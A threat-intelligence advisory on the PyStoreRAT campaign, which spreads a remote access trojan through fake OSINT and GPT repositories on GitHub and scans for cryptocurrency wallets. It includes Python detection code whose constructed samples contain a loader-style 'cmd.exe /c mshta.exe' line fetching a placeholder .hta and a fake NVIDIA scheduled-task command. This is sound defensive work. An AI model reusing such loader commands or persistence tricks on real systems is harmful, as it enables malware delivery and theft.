PyStoreRAT Malware Campaign: Fake OSINT and GPT GitHub Repositories Target Security Researchers and Cryptocurrency Users
- Rescana
- 2 days ago
- 4 min read

Date: December 2025
Prepared by: Rescana OSINT Cybersecurity Research Team
Executive Summary
A sophisticated malware campaign is leveraging fake GitHub repositories, masquerading as OSINT (Open Source Intelligence) and GPT utility tools, to distribute a new modular Remote Access Trojan (RAT) named PyStoreRAT. The campaign targets security researchers, developers, and cryptocurrency users, using deceptive social engineering and supply chain tactics to propagate the malware. The campaign has been active since at least June 2025, with a notable increase in activity and repository popularity in late 2025.
Technical Analysis
Infection Chain
Initial Vector:
- Malicious Python or JavaScript loader stubs are embedded in GitHub repositories posing as OSINT tools, DeFi bots, GPT wrappers, and security utilities.
- These repositories are promoted via social media (YouTube, X/Twitter) and artificially inflated with stars/forks to appear legitimate (Stargazers Ghost Network).
Loader Execution:
- The loader contains minimal code, designed to silently download a remote HTML Application (HTA) file and execute it using mshta.exe.
- If security products like CrowdStrike Falcon or ReasonLabs are detected, the loader attempts to evade detection by launching mshta.exe via cmd.exe.
Payload Delivery:
- The HTA payload delivers PyStoreRAT, a modular, multi-stage RAT capable of executing EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules.
- The RAT profiles the system, checks for admin privileges, and scans for cryptocurrency wallet files (Ledger Live, Trezor, Exodus, Atomic, Guarda, BitBox02).
Persistence & Evasion:
- Persistence is established via a scheduled task disguised as an NVIDIA app self-update.
- The malware deletes the scheduled task post-infection to remove forensic traces.
Command & Control (C2):
PyStoreRAT contacts an external server to fetch and execute commands, including:
- Downloading/executing EXE payloads (e.g., Rhadamanthys info-stealer)
- Downloading/extracting ZIPs
- Executing DLLs via rundll32.exe
- Executing JavaScript in memory (eval())
- Installing MSI packages
- Spawning additional mshta.exe processes
- Executing PowerShell in memory
- Spreading via removable drives (malicious LNK files)
- Deleting persistence tasks
Affected Product Versions
PyStoreRAT is not exploiting a specific software vulnerability, but rather abusing the trust in open-source repositories and targeting users who download and execute code from the following types of repositories:
- Fake OSINT tools (no legitimate product versions, but any repository claiming to be an OSINT tool, DeFi bot, or GPT utility published or updated between June 2025 and December 2025 should be considered suspect if not from a verified source)
- Cryptocurrency wallet software targeted for data theft (not infection):
  - Ledger Live (all versions, as the malware scans for wallet files)
  - Trezor (all versions)
  - Exodus (all versions)
  - Atomic Wallet (all versions)
  - Guarda Wallet (all versions)
  - BitBox02 (all versions)
Note: The infection occurs via execution of malicious code from GitHub, not via a vulnerability in the above wallet products themselves.
Indicators of Compromise (IOCs)
Loader Behavior:
- Python/JavaScript code in GitHub repos that downloads and executes remote HTA files via mshta.exe
Persistence:
- Scheduled task named or disguised as NVIDIA app self-update
C2 Communication:
- Outbound connections to attacker-controlled servers (specific domains/IPs not published in open sources as of this report)
File Artifacts:
- Presence of mshta.exe processes spawned from suspicious scripts
- Malicious LNK files on removable drives
Wallet Targeting:
- Scanning for files related to Ledger Live, Trezor, Exodus, Atomic, Guarda, BitBox02
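A static pre-download check for the Loader Behavior indicator above (a small Python or JavaScript stub that fetches a remote .hta and hands it to mshta.exe, sometimes wrapped in cmd.exe). This is an added example written for this advisory, not code from Rescana or Morphisec; the regex heuristics, the scanned file extensions and the constructed SAMPLE_STUB/SAMPLE_BENIGN strings are assumptions.

```python
import re
import sys
from pathlib import Path

# Heuristics for the loader stub described in the advisory. The pattern
# choices are assumptions for illustration, not published signatures.
LOADER_PATTERNS = {
    "mshta_invocation": re.compile(r"\bmshta(\.exe)?\b", re.IGNORECASE),
    "remote_hta_url": re.compile(r"https?://[^\s'\"]+\.hta\b", re.IGNORECASE),
    "cmd_wrapper": re.compile(r"\bcmd(\.exe)?\s+/c\b", re.IGNORECASE),
    "process_spawn": re.compile(
        r"\b(subprocess\.(Popen|run|call)|os\.system|child_process|execSync|spawn)\b"
    ),
}

def scan_source(text: str) -> dict:
    """Return which loader-stub heuristics match one file's contents."""
    hits = {name: bool(pat.search(text)) for name, pat in LOADER_PATTERNS.items()}
    # The described loader fetches a remote HTA and launches mshta.exe; a bare
    # mention of mshta (e.g. in a README) is only a weak signal on its own.
    hits["likely_loader"] = hits["mshta_invocation"] and (
        hits["remote_hta_url"] or hits["process_spawn"]
    )
    return hits

def scan_repo(root: Path, exts=(".py", ".js")) -> list:
    """Walk a cloned repository and list files that look like loader stubs."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            text = path.read_text(encoding="utf-8", errors="ignore")
            hits = scan_source(text)
            if hits["likely_loader"]:
                findings.append((str(path.relative_to(root)), hits))
    return findings

# Constructed sample text (never executed) mirroring the described stub shape.
SAMPLE_STUB = """
import subprocess
url = "https://example.invalid/update.hta"  # placeholder host, constructed
subprocess.run(["cmd.exe", "/c", "mshta.exe", url])
"""
# Constructed benign file: an ordinary HTTP fetch with no mshta/HTA involvement.
SAMPLE_BENIGN = "import requests\nprint(requests.get('https://example.invalid/api').json())\n"

if __name__ == "__main__":
    for rel, hits in scan_repo(Path(sys.argv[1])):
        print(rel, sorted(k for k, v in hits.items() if v))
```

Run it against a freshly cloned repository before executing anything from it; a `likely_loader` hit is a reason to read the file by hand, not proof by itself.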
Exploitation in the Wild
Victims:
- Security researchers, IT administrators, and cryptocurrency users downloading tools from GitHub
Observed Tactics:
- Use of trending and popular repository lists to increase visibility
- Social media campaigns to drive traffic to malicious repos
- Use of dormant or newly created GitHub accounts for repository creation
- Payloads delivered via "maintenance" commits after initial trust is established
Attribution
Origin:
Russian-language artifacts and coding patterns suggest an Eastern European threat actor (Morphisec)
APT/Group:
No direct attribution to a known APT group as of this report
MITRE ATT&CK Mapping
Initial Access:
T1195.002 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools
Execution:
Persistence:
Defense Evasion:
Credential Access/Collection:
Lateral Movement:
Mitigation Strategies (Specific)
Repository Verification:
- Only download tools from well-known, verified GitHub accounts and cross-check with official project websites or trusted sources.
Code Review:
- Manually inspect code for suspicious loader stubs, especially those invoking mshta.exe or downloading remote HTA files.
Network Monitoring:
- Monitor for unusual outbound connections, especially to newly registered domains or IPs associated with C2 infrastructure.
Endpoint Detection:
- Alert on the creation of scheduled tasks disguised as NVIDIA or other legitimate software updaters.
- Monitor for execution of mshta.exe from non-standard locations or by scripts.
Removable Media Controls:
- Block or restrict execution of LNK files from removable drives.
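Detection logic for the Endpoint Detection items above, run over constructed process-creation and scheduled-task events. This is an added example, not Rescana's tooling; the CSV event schema and column names, the SCRIPT_HOSTS list and every sample path and command line are assumptions, and the NVIDIA rule is a heuristic (task name contains "nvidia" but the creating process is not an NVIDIA binary).

```python
import csv
import io
import re

# Constructed sample telemetry resembling process-creation and scheduled-task
# events. The column names are assumptions, not a specific EDR's schema.
SAMPLE_EVENTS = r"""event,parent_image,image,command_line
process_create,C:\Windows\explorer.exe,C:\Windows\System32\mshta.exe,mshta.exe C:\Users\alice\local.hta
process_create,C:\Python311\python.exe,C:\Windows\System32\cmd.exe,cmd.exe /c mshta.exe https://example.invalid/u.hta
process_create,C:\Windows\System32\cmd.exe,C:\Windows\System32\mshta.exe,mshta.exe https://example.invalid/u.hta
task_create,C:\Windows\System32\mshta.exe,C:\Windows\System32\schtasks.exe,schtasks /create /tn NVIDIA_App_SelfUpdate /tr mshta.exe
process_create,C:\Windows\explorer.exe,C:\Windows\System32\notepad.exe,notepad.exe
"""

# Interpreters and shells a GitHub loader stub would run under (assumption).
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "node.exe", "wscript.exe",
                "cscript.exe", "powershell.exe", "cmd.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: dict) -> list:
    """Return the names of the rules that fire for one event (empty if none)."""
    parent, image = basename(ev["parent_image"]), basename(ev["image"])
    cmd = ev["command_line"]
    alerts = []
    # mshta.exe spawned by a script interpreter, or by the cmd.exe wrapper the
    # loader falls back to when an EDR is present.
    if image == "mshta.exe" and parent in SCRIPT_HOSTS:
        alerts.append("mshta_from_script_host")
    # mshta.exe handed a remote URL rather than a local .hta file.
    if "mshta" in cmd.lower() and REMOTE_URL.search(cmd):
        alerts.append("mshta_remote_hta")
    # Heuristic: a task named like an NVIDIA updater created by a non-NVIDIA process.
    if ev["event"] == "task_create" and "nvidia" in cmd.lower() and "nvidia" not in parent:
        alerts.append("fake_nvidia_update_task")
    return alerts

def run_detections(csv_text: str) -> list:
    """Run classify() over every event; return (image basename, alerts) for hits."""
    hits = []
    for ev in csv.DictReader(io.StringIO(csv_text)):
        alerts = classify(ev)
        if alerts:
            hits.append((basename(ev["image"]), alerts))
    return hits
```

The first sample row (Explorer launching mshta.exe on a local file) deliberately fires nothing, so the rules key on the parent process and the remote URL rather than on mshta.exe alone.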
References
For further details or incident response support, contact Rescana Threat Intelligence.
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with advanced tools to assess, monitor, and mitigate cyber risks across their digital supply chains. Our platform leverages cutting-edge threat intelligence, automation, and analytics to deliver actionable insights and enhance your organization’s security posture. For more information about our solutions or to discuss how we can help you address emerging cyber threats, we are happy to answer questions at ops@rescana.com.